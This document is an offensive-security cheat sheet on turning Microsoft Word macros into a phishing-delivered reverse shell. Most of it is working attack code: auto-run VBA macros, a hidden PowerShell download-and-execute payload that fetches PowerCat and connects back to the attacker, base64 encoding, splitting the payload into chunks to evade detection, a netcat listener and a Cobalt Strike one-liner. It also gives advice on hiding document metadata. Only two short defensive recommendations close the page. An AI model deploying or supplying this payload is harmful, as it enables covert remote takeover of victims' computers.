Microsoft Office Exploit

Table of contents

1. Vulnerability
2. Prerequisites
3. Exploit
4. Useful links
5. Recommendations

---

Vulnerability

Microsoft Office documents like Word can be configured to execute macros. These macros can interact with the Windows system. Microsoft Office exploit consists in taking advantage of these macros to gain an access to the targeted Windows system.

Prerequisites

• Find a way to make your custom Word opened on the target (by doing Phishing for example).

Exploit

Create a .docm or .doc Microsoft Word document and create a new macro.

Macros are not enabled in .docx documents. You should prefer using .doc since .docm are more monitored by systems.

' Macro is automatically executed when the document is opened '
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

' Declare a string and execute it as a system command '
Sub MyMacro()
    Dim Str As String
    CreateObject("Wscript.Shell").Run Str
End Sub

Once the macro is ready, create a payload that will download PowerCat and execute it on the target machine. Don’t forget to encode it in base64.

# Payload that download and execute PowerCat.
# This is an example, you can put whatever you want here.
$Payload = ‘IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1");powercat -c $lhost -p $lport -e powershell’

# Then encode it in base64.
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Payload)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

To hide the payload, it’s recommended to trunk it into smaller chunks of 50 characters or more and concatenate them into the Str variable in the Microsoft Word macro. You can do it using python like below.

# Here, replace 'SQBFAFgAKABOAGUAdwA...' with the content of $EncodedText above
str = "powershell.exe -nop -w hidden -e $EncodedText"

# Trunks of 50 characters
n = 50

for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')

Then, add the result into the macro.

Sub MyMacro()
    Dim Str As String
		Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
		Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
		Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
		Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
		Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
		Str = Str + "A== "
    CreateObject("Wscript.Shell").Run Str
End Sub

Now, find a way to put this file on your target’s workstation (phishing, download link, etc.) and make him open it to execute the payload. You’ll just need to way with your listener.

nc -nvlp 4444

Do not forget to inspect your document in File > Info > Inspect Document > Inspect Document to remove all properties that could look suspicious.

If you’re using Cobalt Strike, go in Attacks > Scripted Web Delivery (S) to generate the payload and a one-liner you can insert in the document directly.

CreateObject("Wscript.Shell").Run "powershell.exe -nop -w hidden -c ""IEX ((New-Object Net.WebClient).DownloadString('http://$lhost/x'))"""

Useful links

• Microsoft 365 phishing templates of ZeroPointSecurity.

Recommendations

• Enforce EDR on computers to detect and block anormal behavior.
• Restrict usage of macros in Microsoft Office in your company.